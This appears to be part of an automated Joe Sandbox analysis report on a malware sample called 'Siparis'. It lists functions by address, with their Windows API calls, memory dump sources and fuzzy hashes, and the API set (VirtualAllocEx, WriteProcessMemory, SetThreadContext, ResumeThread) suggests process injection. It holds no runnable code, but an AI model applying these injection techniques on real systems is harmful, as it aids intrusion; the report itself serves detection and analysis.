Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06C35AB0

Strings

PgM., xrefs: 06C35A3F

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: PgM.
API String ID: 3559483778-1053831580
Opcode ID: c00e085746509489f2560b6e5ab9eeedeaf49e5a6dc36548056da8bca9d52928
Instruction ID: 91a0f3d84b27dedbc66e448da3402b1c7689a0288555129ccc11db0b991a106b
Opcode Fuzzy Hash: c00e085746509489f2560b6e5ab9eeedeaf49e5a6dc36548056da8bca9d52928
Instruction Fuzzy Hash: 60213971D003199FDB10CFAAC885BEEBBF5FF48310F10842AE919A7240D7789944DBA4

Function 06C35B08 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06C35B90

Strings

PgM., xrefs: 06C35B2F

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID: MemoryProcessRead
String ID: PgM.
API String ID: 1726664587-1053831580
Opcode ID: 04674dc33fea4dd4e88d13c176d601caa565ed73c58bd9587a2a8d472f614765
Instruction ID: f57bc011eb74ac922b3ee7e1a4c784711ee1a28a7601f6bd2cea4a87e2d98868
Opcode Fuzzy Hash: 04674dc33fea4dd4e88d13c176d601caa565ed73c58bd9587a2a8d472f614765
Instruction Fuzzy Hash: B32127B1C002098FDB10CFAAC880BEEFBF1FF48310F10882AE558A7250C7399541CBA0

Function 06C35882 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C35906

Strings

PgM., xrefs: 06C358A4

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID: ContextThreadWow64
String ID: PgM.
API String ID: 983334009-1053831580
Opcode ID: 1b70934cc8767cc150409b819b5096b5d16e1bc2277ae1748677f563c9ec9466
Instruction ID: a8c7e1394b6b50bd9f756d568a4cf73606da34847786361930688beeba109670
Opcode Fuzzy Hash: 1b70934cc8767cc150409b819b5096b5d16e1bc2277ae1748677f563c9ec9466
Instruction Fuzzy Hash: 16213A71D003198FDB54DFAAC4857EEBBF4EF48220F54842AD459A7240C7789A45CFA5

Function 06C35B10 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06C35B90

Strings

PgM., xrefs: 06C35B2F

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID: MemoryProcessRead
String ID: PgM.
API String ID: 1726664587-1053831580
Opcode ID: 31a3b2a51753d320efbd3c29895d4737b7ccd180d6b4a007901f130b86942bf4
Instruction ID: 026ad08c1836e822ac89173e9a490ec7b971f570d378cb1b450950596645b93e
Opcode Fuzzy Hash: 31a3b2a51753d320efbd3c29895d4737b7ccd180d6b4a007901f130b86942bf4
Instruction Fuzzy Hash: 682114B1C003599FDB10CFAAC880BEEBBF5FF48310F50842AE519A7240C7799900CBA4

Function 06C35888 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C35906

Strings

PgM., xrefs: 06C358A4

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID: ContextThreadWow64
String ID: PgM.
API String ID: 983334009-1053831580
Opcode ID: b73206ee9b4ebcd64ce775177eeefd10c15a58ab74ef0f4197b9b4b01f8bbae0
Instruction ID: 9ed17554fc83b6e78c6c77328b72c7bfaef6188e9c191fb08b59104f2e608ac6
Opcode Fuzzy Hash: b73206ee9b4ebcd64ce775177eeefd10c15a58ab74ef0f4197b9b4b01f8bbae0
Instruction Fuzzy Hash: C6214971D003098FDB10DFAAC4857EEBBF4EF48220F54842AD419A7240CB789A45CFA5

Function 00D8DAA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D8DB27

Strings

PgM., xrefs: 00D8DABF

Memory Dump Source

Source File: 00000000.00000002.1403797213.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d80000_Siparis.jbxd

Similarity

API ID: DuplicateHandle
String ID: PgM.
API String ID: 3793708945-1053831580
Opcode ID: abc730665f190c9eb03492f0140e7b2645875775de1544af9a49ab5c9e3f78d3
Instruction ID: 6798d641f024451b48407a698d6e5ed07c0b6bfbe1bbbc63ff9830529d62bbdf
Opcode Fuzzy Hash: abc730665f190c9eb03492f0140e7b2645875775de1544af9a49ab5c9e3f78d3
Instruction Fuzzy Hash: 7021D3B59002489FDB10CFAAD884ADEFBF9FB48320F14841AE918A3350D374A944CFA5

Function 06C3595A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06C359CE

Strings

PgM., xrefs: 06C35977

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID: AllocVirtual
String ID: PgM.
API String ID: 4275171209-1053831580
Opcode ID: 513e3f155ad0a00633134ef708db75d6004f56212108268a583e9647a9a6fee5
Instruction ID: 163fbd528c2866d2c31a4f60f1989f29e8056832765fa0c3a532c861c1b9cd93
Opcode Fuzzy Hash: 513e3f155ad0a00633134ef708db75d6004f56212108268a583e9647a9a6fee5
Instruction Fuzzy Hash: 92213872900358DBDB20DFAAC8447DEBBF5EF48320F24881AE559A7250C775A945CFA0

Function 00D8B030 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00D8B8A1,00000800,00000000,00000000), ref: 00D8BAB2

Strings

PgM., xrefs: 00D8BA67

Memory Dump Source

Source File: 00000000.00000002.1403797213.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d80000_Siparis.jbxd

Similarity

API ID: LibraryLoad
String ID: PgM.
API String ID: 1029625771-1053831580
Opcode ID: a706f2821f8b6f40b821263ae32473073dfaf52dd2cbeb8227c24a43297e0a28
Instruction ID: 7e2c9de67d67cfebbe1e15aa5f4f9da552cdebf97aeae26cdd71603cac126154
Opcode Fuzzy Hash: a706f2821f8b6f40b821263ae32473073dfaf52dd2cbeb8227c24a43297e0a28
Instruction Fuzzy Hash: 801117B6D003099FDB14DF9AC444ADEFBF5EB48320F14842AD519A7300C3B5A545CFA5

Function 00D8BA41 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00D8B8A1,00000800,00000000,00000000), ref: 00D8BAB2

Strings

PgM., xrefs: 00D8BA67

Memory Dump Source

Source File: 00000000.00000002.1403797213.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d80000_Siparis.jbxd

Similarity

API ID: LibraryLoad
String ID: PgM.
API String ID: 1029625771-1053831580
Opcode ID: 39491eb5b14063d794335088331e02590b6372060491e26896702ee45261c4dd
Instruction ID: a147325d096f80204a2504a65f73050ed75afa092fc0b9c5a184da4798b27104
Opcode Fuzzy Hash: 39491eb5b14063d794335088331e02590b6372060491e26896702ee45261c4dd
Instruction Fuzzy Hash: F52114B6C002499FDB14CFAAC484ADEFBF5EF48320F14846AD529A7200C3B5A545CFA5

Function 06C35960 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06C359CE

Strings

PgM., xrefs: 06C35977

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID: AllocVirtual
String ID: PgM.
API String ID: 4275171209-1053831580
Opcode ID: fa44aa399109564dcfe4d5d1238d9b6a264635db3b5e978d64bf53959f6bbc98
Instruction ID: cbd88c67315eceb30e812d369b01065a9c0c33ed28791e0b727ae5332c9ca374
Opcode Fuzzy Hash: fa44aa399109564dcfe4d5d1238d9b6a264635db3b5e978d64bf53959f6bbc98
Instruction Fuzzy Hash: 5D1137729003499FDB10DFAAC845BDFBBF5EF48324F14841AE529A7250C7759940CFA0

Function 06C357D2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 06C3583A

Strings

PgM., xrefs: 06C357EF

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID: ResumeThread
String ID: PgM.
API String ID: 947044025-1053831580
Opcode ID: 40c425c8cbbdc911f3c9a9ea60e7ca0f372a7e3f82b43119b4d07efba126a74d
Instruction ID: 39c84a31b17407e9a6ab1c293fefc5a8382118c26e3574c3d72b330ff7f6a127
Opcode Fuzzy Hash: 40c425c8cbbdc911f3c9a9ea60e7ca0f372a7e3f82b43119b4d07efba126a74d
Instruction Fuzzy Hash: CD1146719003188BDB20DFAAC8447DFFBF5AF88324F20881AD559A7240C775A945CBA5

Function 06C357D8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 06C3583A

Strings

PgM., xrefs: 06C357EF

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID: ResumeThread
String ID: PgM.
API String ID: 947044025-1053831580
Opcode ID: 130781e2be26237110784fc1274de4b2685f277fea40607d167729d5464773ce
Instruction ID: fd06f826d0aafdbc1ecf7cc32f63c3879049258fb49880881cb1d263e872e0d2
Opcode Fuzzy Hash: 130781e2be26237110784fc1274de4b2685f277fea40607d167729d5464773ce
Instruction Fuzzy Hash: 31113A71D003488FDB14DFAAC8457DFFBF5AF88224F14841AD519A7640C7756544CFA5

Function 00D8B7C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00D8B826

Strings

PgM., xrefs: 00D8B7DF

Memory Dump Source

Source File: 00000000.00000002.1403797213.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d80000_Siparis.jbxd

Similarity

API ID: HandleModule
String ID: PgM.
API String ID: 4139908857-1053831580
Opcode ID: a732138ebf1188321058e35ec70231a6a3476e1c43d809d680eff23c59000a9d
Instruction ID: 2494662c6a72613f6f6c77d1e1cd7adeb3837780756066336bdc33d225c5d760
Opcode Fuzzy Hash: a732138ebf1188321058e35ec70231a6a3476e1c43d809d680eff23c59000a9d
Instruction Fuzzy Hash: 72110FB6C002498FCB10DF9AD444ADEFBF8EF88320F14842AD429A7200C375A545CFA1

Function 06C346C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06C38D45

Strings

PgM., xrefs: 06C38D02

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID: MessagePost
String ID: PgM.
API String ID: 410705778-1053831580
Opcode ID: 40ce861d2ab8146b3f443286a5fbe6999298756d62095e5917ee6d96f9c32283
Instruction ID: 10b6a6ebeb49ab65f825ec23f2ed3a5f5899719cd719947c0eeb1dbf6b7cb313
Opcode Fuzzy Hash: 40ce861d2ab8146b3f443286a5fbe6999298756d62095e5917ee6d96f9c32283
Instruction Fuzzy Hash: 011103B58003499FDB20DF9AC884BDEBBF8FB48324F10845AE518A7640C375A944CFA1

Function 06C38CE1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06C38D45

Strings

PgM., xrefs: 06C38D02

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID: MessagePost
String ID: PgM.
API String ID: 410705778-1053831580
Opcode ID: 3194a23fa73f50908e15947c220778b11e92bf5e5add8cfbbbe73db4e76c23e4
Instruction ID: 160cb4212bb50bffb02ea69be7fd86219ff1b78ec9553e92f8602af5f778c669
Opcode Fuzzy Hash: 3194a23fa73f50908e15947c220778b11e92bf5e5add8cfbbbe73db4e76c23e4
Instruction Fuzzy Hash: FF1106B58003599FDB10CF9AC884BDEFBF8FB48314F20841AE558A7250C375A544CFA1

Function 00ADD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1403156197.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_add000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e28ffd710162b0615e08502b4ca5fa74b870f161fad050e982f102b9c3fa8a0
Instruction ID: 8c339d42e125bfe61a788886c7dfdd9a0b9e66755b5ac15ec58201a4cb600209
Opcode Fuzzy Hash: 5e28ffd710162b0615e08502b4ca5fa74b870f161fad050e982f102b9c3fa8a0
Instruction Fuzzy Hash: D12125B1504204EFDB14DF10D9C0B26BBA5FB98324F20C56AE80A0B356C336E856CBA2

Function 00AED01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1403197013.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aed000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9649785e93b7ca5238fa182ae1e145a1f883bafeb67db567d07851aa6ad7dd76
Instruction ID: e329de4909b6a499aca0da9bfc85b8a677c2972e57eda67f40907bb37aee45f3
Opcode Fuzzy Hash: 9649785e93b7ca5238fa182ae1e145a1f883bafeb67db567d07851aa6ad7dd76
Instruction Fuzzy Hash: 2C210471604380EFDB14DF20D9C4B26BBA5FB84314F28C56DE84A4B286C337D847CA62

Function 00AED1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1403197013.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aed000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2446aaa64a23c1ae34877ecf5bcec7c0eab5741f8e9e31eb04beff6e1608a7e
Instruction ID: 7e06b81d077a1de3777b21d272a514fb3f1d40b6d85194f3eacd0bda6dd7ffb8
Opcode Fuzzy Hash: d2446aaa64a23c1ae34877ecf5bcec7c0eab5741f8e9e31eb04beff6e1608a7e
Instruction Fuzzy Hash: B02126B5504380EFDB05DF21D9C0B66BBA5FB84314F20C66DEA494F292C336D846CB62

Function 00AED006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1403197013.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aed000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94addd65c0b1277c7a217088e0449e2efa728612701a86b2d979efb4c6179cec
Instruction ID: 37830120cb02e0f9c688b6c3e72652e3f594cc884485546ffeac26c50c53ee30
Opcode Fuzzy Hash: 94addd65c0b1277c7a217088e0449e2efa728612701a86b2d979efb4c6179cec
Instruction Fuzzy Hash: 00216F755093C08FCB12CF24D994715BF71EB46314F28C5EAD8498F6A7C33A984ACB62

Function 00ADD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1403156197.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_add000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction ID: 68ffc79502dea7a7d9673e4bb25ab19fff3d82add28702d4fbdb3582ce86fabd
Opcode Fuzzy Hash: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction Fuzzy Hash: A011E6B6504240DFCB15CF10D5C4B16BF71FB94324F24C6AAD80A0B756C33AE85ACBA1

Function 00AED1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1403197013.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aed000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
Instruction ID: fa4fcaaf333d302ee8047095a5c1797c49c4165be5db232cbd5d7d4f3bb12bbd
Opcode Fuzzy Hash: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
Instruction Fuzzy Hash: CC119D75504280DFCB15CF10D5C4B55FBB1FB84318F24C6ADD9494B696C33AD84ACB61

Function 00ADD759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1403156197.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_add000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55df6430def44fdb5259d5d259c63820561056293a262077c21ffd770cf1c2a4
Instruction ID: 98a0244566db08ab2d73f0135b177c840d68f2a8640e34ef3087e2df1efb793d
Opcode Fuzzy Hash: 55df6430def44fdb5259d5d259c63820561056293a262077c21ffd770cf1c2a4
Instruction Fuzzy Hash: 3B01DB71004344AFE7204B65CC84767FBE8EF51724F18C49BED0A0A386C7799844C672

Function 00ADD758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1403156197.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_add000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 627fef5846e0358adf979283d7a0b75a72798d8b8e38b03404fcb203b4a64df3
Instruction ID: 1dbef6171eee7325e71ce84015d28d5bbff3bc7a634e1c8fcf3f0ff1fecb8a66
Opcode Fuzzy Hash: 627fef5846e0358adf979283d7a0b75a72798d8b8e38b03404fcb203b4a64df3
Instruction Fuzzy Hash: D0F062714043449EE7208B16DC88B62FBE8EF51734F18C49BED094A386C379A844CAB1

Non-executed Functions

Function 06C39E20 Relevance: .4, Instructions: 412COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424dccefa4990eac3152b3cb50b68256a6280614c501ca8fc40eb105c288d6e2
Instruction ID: 28640f6491cf3a0f97c3c5551f5432f723266e110d5f66e9020417454dd02671
Opcode Fuzzy Hash: 424dccefa4990eac3152b3cb50b68256a6280614c501ca8fc40eb105c288d6e2
Instruction Fuzzy Hash: 51E17E71B007208FEBA9EB75C850B6E73F6AF89700F14446DE15A8B391DB79E901CB61

Function 04E70920 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1414915850.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e70000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28d53c88ae2fab3510d5101716358af2b4992f9d7b1b7b6a6c0862e68cd62b3d
Instruction ID: 93af040aa22efe0575241f257ba74ae2ec7ccf63bf8f7e29645c9d4c5684b858
Opcode Fuzzy Hash: 28d53c88ae2fab3510d5101716358af2b4992f9d7b1b7b6a6c0862e68cd62b3d
Instruction Fuzzy Hash: 0512B7F8C817458EE712CF29E85C1893BB1B781318BD84A29D2612B6E5D7BC256ACF44

Function 06C32EF0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81bf76e84ef411f18d77a359234bb44da9aa24c714ad4a0cb4ac733de2d8735d
Instruction ID: 4e9823e8989015e61521fa2c99a95e8b2df61d2a3e601bf7062112aa23fbbf08
Opcode Fuzzy Hash: 81bf76e84ef411f18d77a359234bb44da9aa24c714ad4a0cb4ac733de2d8735d
Instruction Fuzzy Hash: 45E13B74E002A98FDB14DFA8C5809AEFBB2FF89301F248169D519AB355D731AD41CFA0

Function 06C34FB0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 701729f15dbaee06fdf3341497cbaab49564d7df169d4a73bc10e60509b5d254
Instruction ID: 5885477d014053598942a68f48cb2478d580f582f8f35d39ca5464981e7ddf40
Opcode Fuzzy Hash: 701729f15dbaee06fdf3341497cbaab49564d7df169d4a73bc10e60509b5d254
Instruction Fuzzy Hash: E9E13874E002698FDB54DFA8C580AAEFBB2FF89304F648169E505AB355D731AD41CFA0

Function 06C33760 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34e9165529e1cf6e3376db1339e16e3009474fe82b01365d0c332ddd9b6c7f10
Instruction ID: 9ee92a763a54fb7666a9ed5680a73c4852299e9bfab2ff9f530fa03ca6845b27
Opcode Fuzzy Hash: 34e9165529e1cf6e3376db1339e16e3009474fe82b01365d0c332ddd9b6c7f10
Instruction Fuzzy Hash: 6FE10874E00299CFDB14DFA9C580AAEFBB2BF89305F248169E519AB355D730AD41CF60

Function 06C33328 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f19ed567013681cba7934d7295fa1e3beec4db8d98be411e228313e39a8f357
Instruction ID: b734b205d7bd88825412a7567348dceac8d7d52476478b90723166983e5ce0ad
Opcode Fuzzy Hash: 3f19ed567013681cba7934d7295fa1e3beec4db8d98be411e228313e39a8f357
Instruction Fuzzy Hash: A7E12A74E00299CFDB14DFA9C5809AEFBB2BF89304F248169E519AB355D731AD41CFA0

Function 06C36870 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77197674a9b33b0acc6fcdc9d6c01dae184d8839f5935940ff6a8850d9bea54f
Instruction ID: f02df9f16771b67373232607fe9426d82e453592a0dde518d7378079745dc889
Opcode Fuzzy Hash: 77197674a9b33b0acc6fcdc9d6c01dae184d8839f5935940ff6a8850d9bea54f
Instruction Fuzzy Hash: F7E11774E002699FDB14DFA9C580AAEFBB2FF89304F2481A9E515AB355D730AD41CF60

Function 00D8E3A4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1403797213.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d80000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d673ec340a866ec0cacb6c3c1e58a3bc6057cb27e658a2a0bcef8f56f91b57c1
Instruction ID: 31b90202d4bec1cf2a6a0f4a6f6ffa7cbcf029e607cc8d8ae5bbf3a53846eb8c
Opcode Fuzzy Hash: d673ec340a866ec0cacb6c3c1e58a3bc6057cb27e658a2a0bcef8f56f91b57c1
Instruction Fuzzy Hash: 7EA15C32E002199FCF09EFB4D88459EB7B2FF85300B19457AE805AB265EB31E915CF60

Function 04E70910 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1414915850.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e70000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7647aca02e241357d1132624adc5419019fda59ecc7fa5367e16d3ba298425f
Instruction ID: 7d4c80dc416763e53653fa408b061eb5b5bb02198dd342dedc11b17ba0b4b469
Opcode Fuzzy Hash: d7647aca02e241357d1132624adc5419019fda59ecc7fa5367e16d3ba298425f
Instruction Fuzzy Hash: 3CC141B8C81745CFE712CF69E8481897BB1FB85318F984B29D1616B2D0DBBC256ACF44

Function 06C32EC3 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9499024b8bbd2739239d32b58f766672d9a8057b85e736103aee1dd3213007f
Instruction ID: 078d2444045bbed562e10b21a895e63cc43b36ae14e7f10eecfd4dd2f0686c77
Opcode Fuzzy Hash: d9499024b8bbd2739239d32b58f766672d9a8057b85e736103aee1dd3213007f
Instruction Fuzzy Hash: 84515074E002698FDB14CFA9C5805AEFBF2FF89300F248169D519AB316D7319A42CFA0

Function 06C34F9F Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b343aaf5011dadfa2d4d2463f30dbb9c3368ff0a84d56a66ee321ca9b2364c5b
Instruction ID: 6989b21998306a3d99fda55bec04bc473933b61f587e6095297070f6e17ea2dd
